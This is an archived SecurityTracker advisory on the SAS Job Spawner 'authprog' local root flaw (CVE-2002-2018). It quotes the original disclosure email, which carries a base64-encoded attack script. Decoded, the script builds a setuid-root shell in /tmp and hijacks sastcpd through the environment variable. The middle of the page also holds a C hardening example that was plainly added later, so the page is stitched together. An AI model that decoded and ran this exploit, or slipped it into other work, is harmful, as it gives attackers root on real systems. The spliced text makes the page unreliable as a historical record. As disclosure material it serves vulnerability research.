SecurityTracker.com

SecurityTracker Archives

Category:   Application (Generic)  >   SAS Vendors:   SAS Institute Inc.
(Additional Vulnerabilities Are Reported) Re: SAS Job Spawner Buffer Overflow and Format String Bug Let Local Users Execute Arbitrary Code on the System with Root Privileges and Gain Root Privileges on the System
SecurityTracker Alert ID:  1003406
SecurityTracker URL:  http://securitytracker.com/id/1003406
CVE Reference:   CVE-2002-2018   (Links to External Site)
Updated:  Jun 8 2008
Original Entry Date:  Jan 31 2002
Impact:   Execution of arbitrary code via local system, Root access via local system
Exploit Included:  Yes  
Version(s): SAS Job Spawner for Open Systems 8.00
Description:   A vulnerability was reported in the SAS Job Spawner (sastcpd). A local user can obtain root privileges on the system.

In addition to the vulnerability reported by Ministry-of-Peace in the original alert, a new vulnerability has been reported.

The original vulnerability was in passing long command line arguments to sastcpd, causing arbitrary code to be executed with root privileges. See the earlier alert for details.

The newly reported vulnerabilities involve a local user setting an environment variable to a certain value to cause arbitrary code to be executed. It is reported that a local user can set the 'authprog' environment variable which is passed to execve(), allowing the local user to execute arbitrary commands with root privileges. A demonstration exploit script is provided (it is Base64 encoded within the Source Message).
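The pattern the advisory describes (a privileged daemon handing an environment-supplied path to execve()) is worth seeing next to the checks that prevent it. The following is an added example written for this entry; it is not code from SAS or from the advisory's source message. The directory name TRUSTED_AUTH_DIR, the helper name sasauth and the sample candidate paths are assumptions constructed for the illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

extern char **environ;

/* Assumed directory: the only place a privileged spawner may exec an
 * authentication helper from. Not a real SAS path. */
#define TRUSTED_AUTH_DIR "/usr/local/sas/utilities/bin/"

/* The pattern the advisory describes: a path read from the caller's
 * environment goes straight to execve(). In a setuid-root binary the caller
 * controls both the path and the inherited environment. Shown for contrast;
 * never called below. */
void run_authprog_unsafe(void)
{
    char *prog = getenv("authprog");
    char *argv[] = { prog, NULL };
    if (prog != NULL)
        execve(prog, argv, environ);
}

/* String-level policy: absolute, directly inside TRUSTED_AUTH_DIR, a single
 * visible path component. Rejects "..", nested paths and dotfiles. */
int authprog_path_allowed(const char *path)
{
    size_t dirlen = strlen(TRUSTED_AUTH_DIR);
    if (path == NULL || path[0] != '/')
        return 0;
    if (strncmp(path, TRUSTED_AUTH_DIR, dirlen) != 0)
        return 0;
    const char *base = path + dirlen;
    if (*base == '\0' || *base == '.')
        return 0;
    if (strchr(base, '/') != NULL)
        return 0;
    return 1;
}

/* Filesystem-level policy: a regular file owned by root that group/others
 * cannot write, so an unprivileged user cannot replace it. Returns 0 when
 * the file does not exist or fails any check. */
int authprog_file_trusted(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return 0;
    if (!S_ISREG(st.st_mode))
        return 0;
    if (st.st_uid != 0)
        return 0;
    if (st.st_mode & (S_IWGRP | S_IWOTH))
        return 0;
    return 1;
}

/* Hardened launcher: the path comes from a root-owned configuration value
 * (not from getenv), must pass both policies, the child gets a fixed
 * environment instead of the inherited one, and privileges are dropped
 * before the exec. Returns -1 without exec'ing if any check fails. */
int run_authprog_hardened(const char *configured_path)
{
    static char *const safe_env[] = { "PATH=/usr/bin:/bin", NULL };
    char *argv[2];

    if (!authprog_path_allowed(configured_path))
        return -1;
    if (!authprog_file_trusted(configured_path))
        return -1;
    if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
        return -1;
    argv[0] = (char *)configured_path;
    argv[1] = NULL;
    execve(configured_path, argv, safe_env);
    return -1; /* only reached if execve itself fails */
}

int main(void)
{
    /* Constructed candidates standing in for values a local user could
     * place in the environment variable the advisory names. */
    const char *candidates[] = {
        "/tmp/attacker-controlled",
        "/usr/local/sas/utilities/bin/../../../../tmp/attacker-controlled",
        "/usr/local/sas/utilities/bin/.hidden",
        "/usr/local/sas/utilities/bin/sasauth",
        NULL
    };
    for (int i = 0; candidates[i] != NULL; i++)
        printf("%-66s path policy: %s\n", candidates[i],
               authprog_path_allowed(candidates[i]) ? "allow" : "reject");
    return 0;
}
```

The two policy functions are independent so each can be unit-tested offline; the string check keeps traversal and relative names out before any filesystem access, and the stat check ensures that even a correctly named file cannot have been swapped by an unprivileged user. Dropping privileges before execve is the right default where the helper does not itself need root; where it does, the path and environment checks are the minimum the privileged parent must enforce.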

It is also reported that a remote user can cause sastcpd to crash if the 'netencralg' environment variable is set to any value.

All tests were run on SunOS 5.8.

Impact:   A local user can execute arbitrary code on the system with root level privileges, giving that user root access on the system.
Solution:   The vendor issued a fix for other SAS Job Spawner vulnerabilities in version 8.2. It is not clear if these newly reported vulnerabilities are also corrected in version 8.2. If the vendor clarifies, we will update this entry.
Vendor URL:  www.sas.com/SASHome.html (Links to External Site)
Cause:   Boundary error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any)
Underlying OS Comments:  Tested on SunOS 5.8

Message History:   This archive entry is a follow-up to the message listed below.
Jan 29 2002 SAS Job Spawner Buffer Overflow and Format String Bug Let Local Users Execute Arbitrary Code on the System with Root Privileges and Gain Root Privileges on the System



 Source Message Contents

Subject:  sastcpd 8.0 'authprog' local root vulnerability


--=.g8ZC'15jPPYm)M
Content-Type: multipart/mixed;
 boundary="Multipart_Wed__30_Jan_2002_22:40:58_-0800_081ee518"


--Multipart_Wed__30_Jan_2002_22:40:58_-0800_081ee518
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

Hi,

Several environment variable problems exist in the 'SAS Job Spawner for Open Systems version 8.00'. No other releases of the software were available to test. Sorry.

authprog vulnerability
----------------------

The daemon passes a user-defined environment variable, 'authprog', to execve(). This obviously is a problem if sastcpd is setuid. A sample 'exploit' is attached.

netencralg vulnerability
------------------------

I haven't poked at this long enough to determine whether or not it is exploitable. sastcpd segfaults if 'netencralg' is set to any value.

All tests were run on SunOS 5.8.
Both vulnerabilities were discovered with Dave Aitel's/AtStake simple-yet-sexy sharefuzz 1.0.

cheers,
--rpc
--Multipart_Wed__30_Jan_2002_22:40:58_-0800_081ee518
Content-Type: text/x-sh;
 name="authme.sh"
Content-Disposition: attachment;
 filename="authme.sh"
Content-Transfer-Encoding: base64

IyEvYmluL2Jhc2gKIyBzYXN0Y3BkIDguMCAnYXV0aHByb2cnIHZ1bG5lcmFiaWxpdHkuCiMgcnBj
IDxycGNAdW5ob2x5Lm5ldD4gfHwgPGhAY2t6Lm9yZz4KIyBUaGFua3Mgc2hhcmVmdXp6IQoKY2F0
IDw8RU9UID4vdG1wL2hlc2guYwppbnQKbWFpbih2b2lkKQp7CglzZXR1aWQoMCk7CglzZXRnaWQo
MCk7CglleGVjbCgiL2Jpbi9rc2giLCAia3NoIiwgKGNoYXIgKikwKTsKfQpFT1QKCmNhdCA8PEVP
VCA+L3RtcC9oZWguYwppbnQKbWFpbih2b2lkKQp7CglzZXR1aWQoMCk7CglzZXRnaWQoMCk7Cglz
eXN0ZW0oImNob3duIDA6MCAvdG1wL2hlc2giKTsKCXN5c3RlbSgiY2htb2QgNDc1NSAvdG1wL2hl
c2giKTsKCXJldHVybiAwOwp9CkVPVAoKZ2NjIC1vIC90bXAvaGVoIC90bXAvaGVoLmMKZ2NjIC1v
IC90bXAvaGVzaCAvdG1wL2hlc2guYwoKZXhwb3J0IGF1dGhwcm9nPS90bXAvaGVoCi9wYXRoL3Rv
L3Nhcy91dGlsaXRpZXMvYmluL3Nhc3RjcGQKCnNsZWVwIDEKcm0gL3RtcC9oZSouYwpybSAvdG1w
L2hlaAovdG1wL2hlc2gK

--Multipart_Wed__30_Jan_2002_22:40:58_-0800_081ee518--

--=.g8ZC'15jPPYm)M
Content-Type: application/pgp-signature

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)

iD8DBQE8WOcBKfBLFoWw9OURAkWhAJ9VIwND5dVN71rG//BADTcKQX095ACcCoqr
OX5KbLfH2tRi7Plamt/ObFE=
=QSeD
-----END PGP SIGNATURE-----

--=.g8ZC'15jPPYm)M--
